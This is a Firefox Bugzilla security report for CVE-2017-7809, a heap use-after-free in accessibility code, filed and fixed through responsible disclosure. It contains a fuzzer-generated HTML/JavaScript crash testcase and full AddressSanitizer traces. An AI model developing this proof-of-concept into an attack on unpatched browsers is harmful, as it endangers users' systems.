Bug 1380284 (CVE-2017-7809)

heap-use-after-free in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded

RESOLVED FIXED in Firefox -esr52

Status

()

RESOLVED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: smaug)

Tracking

({csectype-uaf, sec-high, testcase})

unspecified
mozilla57
csectype-uaf, sec-high, testcase
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5255+ fixed, firefox55+ fixed, firefox56+ fixed, firefox57+ fixed)

Details

(Whiteboard: [adv-main55+][adv-esr52.3+])

Attachments

(3 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170711160010).

<script>
function start() {
	fuzzPriv.enableAccessibility();
	o1=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o2=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o4=document.createElementNS('http://www.w3.org/1999/xhtml','div');
	o5=window.document;
	o6=document.documentElement;
	document.documentElement.parentNode.removeChild(o6);
	o1.appendChild(o2);
	o22=window.getSelection();
	o38=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	o2.appendChild(o38);
	try{o5.designMode='on';}catch(e){}
	o4.style.position='absolute';
	o5.write('<html><body><div></div><div></div></body></html>');
	o4.prepend(o1,undefined);
	o106=document.createElementNS('http://www.w3.org/1999/xhtml','tr');
	window.top.document.documentElement.appendChild(o4);
	o22.selectAllChildren(o38);
	window.top.document.documentElement.appendChild(o106);
	fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
	location.reload();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==16173==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00005917c at pc 0x7f323e0d3825 bp 0x7fff23077f90 sp 0x7fff23077f88
READ of size 4 at 0x60d00005917c thread T0 (Web Content)
    #0 0x7f323e0d3824 in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12
    #1 0x7f323e0d3824 in HasID /home/worker/workspace/build/src/dom/base/nsINode.h:1601
    #2 0x7f323e0d3824 in mozilla::a11y::DocAccessible::RelocateARIAOwnedIfNeeded(nsIContent*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2043
    #3 0x7f323e069e30 in mozilla::a11y::TreeWalker::AccessibleFor(nsIContent*, unsigned int, bool*) /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:321:15
    #4 0x7f323e06a317 in mozilla::a11y::TreeWalker::Next() /home/worker/workspace/build/src/accessible/base/TreeWalker.cpp:175:27
    #5 0x7f323e0dcd07 in mozilla::a11y::DocAccessible::CacheChildrenInSubtree(mozilla::a11y::Accessible*, mozilla::a11y::Accessible**) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2293:39
    #6 0x7f323e0dc1cf in mozilla::a11y::DocAccessible::DoInitialUpdate() /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:1516:3
    #7 0x7f323e04aa76 in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:627:16
    #8 0x7f323ae61f77 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1854:12
    #9 0x7f323ae71855 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:298:7
    #10 0x7f323ae71524 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:320:5
    #11 0x7f323ae73bbb in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:761:5
    #12 0x7f323ae73bbb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:674
    #13 0x7f323ae737c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:575:9
    #14 0x7f323b6a53e2 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:67:16
    #15 0x7f32355123c1 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #16 0x7f32350e3f2f in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1608:28
    #17 0x7f323503018e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #18 0x7f323502d2d4 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #19 0x7f323502ebb4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #20 0x7f323502f198 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #21 0x7f323421f875 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1437:14
    #22 0x7f3234225aa8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #23 0x7f3235037e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #24 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #25 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #26 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #27 0x7f323a7c237f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #28 0x7f323ea50817 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #29 0x7f3234f940e0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #30 0x7f3234f940e0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #31 0x7f3234f940e0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #32 0x7f323ea5027d in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #33 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #34 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #35 0x7f325165e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #36 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)

0x60d00005917c is located 28 bytes inside of 136-byte region [0x60d000059160,0x60d0000591e8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f32340bbc47 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2661:25
    #2 0x7f32340c2e0b in FreeSnowWhite /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2849:3
    #3 0x7f32340c2e0b in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3851
    #4 0x7f32340c2323 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3672:9
    #5 0x7f32340c6100 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4209:21
    #6 0x7f3236f9337d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1676:3
    #7 0x7f3236ae145b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1409:3
    #8 0x7f323423ee21 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7f3235b22fe0 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7f3235b22fe0 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7f3235b22fe0 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7f3235b2a05f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:967:12
    #13 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #15 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #16 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #17 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #18 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #19 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #20 0x7f323f894243 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2889:12
    #21 0x7f3235a44a1b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #24 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #25 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #26 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #27 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #28 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #29 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #30 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7f3238d342b5 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #34 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #35 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #36 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
    #37 0x7f323afc4e6f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f3239075493 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f3239075493 in NS_NewHTMLSpanElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLSpanElement.cpp:15
    #4 0x7f32390fda92 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:287:41
    #5 0x7f32390fda92 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:258
    #6 0x7f3236fc48c3 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:183:12
    #7 0x7f3236eb23bb in nsDocument::CreateElem(nsAString const&, nsIAtom*, int, nsAString const*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8463:17
    #8 0x7f323a8e6531 in mozilla::EditorBase::CreateHTMLContent(nsIAtom*) /home/worker/workspace/build/src/editor/libeditor/EditorBase.cpp:4720:15
    #9 0x7f323a945bb8 in mozilla::HTMLEditor::CreateAnonymousElement(nsIAtom*, nsIDOMNode*, nsAString const&, bool) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:191:32
    #10 0x7f323aa25f1c in CreateResizingInfo /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:210:5
    #11 0x7f323aa25f1c in mozilla::HTMLEditor::ShowResizersInner(nsIDOMElement*) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:350
    #12 0x7f323a9480ee in ShowResizers /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:283:17
    #13 0x7f323a9480ee in mozilla::HTMLEditor::CheckSelectionStateForAnonymousButtons(nsISelection*) /home/worker/workspace/build/src/editor/libeditor/HTMLAnonymousNodeEditor.cpp:455
    #14 0x7f323aa2185f in mozilla::ResizerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/editor/libeditor/HTMLEditorObjectResizer.cpp:93:19
    #15 0x7f3236d40356 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/dom/base/Selection.cpp:3764:15
    #16 0x7f323b1ddfc0 in NotifySelectionListeners /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2069:23
    #17 0x7f323b1ddfc0 in nsFrameSelection::EndBatchChanges(short) /home/worker/workspace/build/src/layout/generic/nsFrameSelection.cpp:2057
    #18 0x7f3236d40b56 in mozilla::dom::Selection::EndBatchChangesInternal(short) /home/worker/workspace/build/src/dom/base/Selection.cpp:3792:21
    #19 0x7f3236d3bf1b in ~SelectionBatcher /home/worker/workspace/build/src/dom/base/Selection.h:484:19
    #20 0x7f3236d3bf1b in mozilla::dom::Selection::SelectAllChildren(nsINode&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Selection.cpp:3186
    #21 0x7f3236d3c074 in mozilla::dom::Selection::SelectAllChildrenJS(nsINode&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/Selection.cpp:3169:3
    #22 0x7f3237b86365 in mozilla::dom::SelectionBinding::selectAllChildren(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:719:9
    #23 0x7f32389358a0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3060:13
    #24 0x7f323ef1d164 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #25 0x7f323ef1d164 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #26 0x7f323ef05f8b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #27 0x7f323ef05f8b in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #28 0x7f323eeecd08 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #29 0x7f323ef1d2fc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #30 0x7f323ef1dc52 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f323f8960cb in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #32 0x7f323837d2b5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f3238d342b5 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f3238d342b5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f3238cfc219 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1141:51
    #36 0x7f3238cfe2a4 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
    #37 0x7f3238cddfa1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f3238ce1472 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1592:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a800031d0: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fd fd
  0x0c1a800031e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a800031f0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80003200: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80003210: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1a80003220: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd[fd]
  0x0c1a80003230: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a80003240: fa fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00
  0x0c1a80003250: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c1a80003260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80003270: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16173==ABORTING
(Reporter)

Comment 1

2 years ago
Posted file ASAN output
alexander: looks like this is reading a freed boolean. What happens after that? would use be benign, or would there be a following UAF on the same object with more import?
Flags: needinfo?(surkov.alexander)
Group: core-security → dom-core-security
Again, got stuck with DOMFuzzer, I'm following these steps:
1) allow unsigned add-ons, i.e., set xpinstall.signatures.required to false
2) install https://www.squarefree.com/extensions/domFuzzLite3.xpi 

It says "DOM Fuzz Helper could not be installed because it is incompatible with Nightly 56.0a1"

Any hints?
Flags: needinfo?(surkov.alexander)
(Reporter)

Comment 4

2 years ago
Try setting extensions.allow-non-mpc-extensions to true
Keywords: csectype-uaf, sec-high, testcase
(In reply to Nils from comment #4)
> Try setting extensions.allow-non-mpc-extensions to true

yep, that made a trick, thanks!
Assignee: nobody → eitan
It looks like the DOM node is being deleted prematurely during tree traversal while still bound to the document. Is this a cycle collection bug?

I'm getting this assertion:
Assertion failure: mSubtreeRoot == this (Didn't restore state properly?), at /home/eitan/Mozilla/gecko/dom/base/nsINode.cpp:157

I get this also when I comment out enableAccessibility from the test case, so I am assuming this is not an accessibility API issue.

Olli added that assertion, so he may have a better idea of how we got to that state.
Flags: needinfo?(bugs)
(Assignee)

Comment 7

2 years ago
Hmm, some native anonymous span element. Sounds like editor.
Assignee: eitan → nobody
Component: Disability Access APIs → Editor
(Assignee)

Updated

2 years ago
Assignee: nobody → bugs
Flags: needinfo?(bugs)
(Assignee)

Comment 8

2 years ago
Sorry, I messed with bugs now. I managed to upload the patch for this to bug 1371657.
(Assignee)

Comment 9

2 years ago
This patch landed to m-i and beta in bug 1371657
I assume Al's going to need to do some security flag switcharoos here too.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: --- → fixed
status-firefox56: --- → fixed
status-firefox57: --- → fixed
status-firefox-esr52: --- → fixed
tracking-firefox55: --- → ?
tracking-firefox56: --- → ?
tracking-firefox57: --- → ?
tracking-firefox-esr52: --- → ?
Flags: needinfo?(abillings)
Resolution: --- → FIXED
Target Milestone: --- → mozilla57
Version: 56 Branch → unspecified
Nils, looks like we, uh, *cough*, accidentally fixed this bug in Firefox 55 and ESR52.3.

Can you validate it is fixed in 55? Builds go live in the morning so the advisory will probably be slightly delayed while we wait confirmation.
Flags: needinfo?(abillings) → needinfo?(nils)
Alias: CVE-2017-7809
Group: dom-core-security → core-security-release
tracking-firefox55: ? → +
tracking-firefox56: ? → +
tracking-firefox57: ? → +
tracking-firefox-esr52: ? → 55+
(Reporter)

Comment 12

2 years ago
Al, I can confirm that the testcase doesn't reproduce in the latest ASAN build of Firefox 55 :)
Flags: needinfo?(nils)
Whiteboard: [adv-main55+][adv-esr52.3+]
Added to the 55 and ESR 52.3 advisory.
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.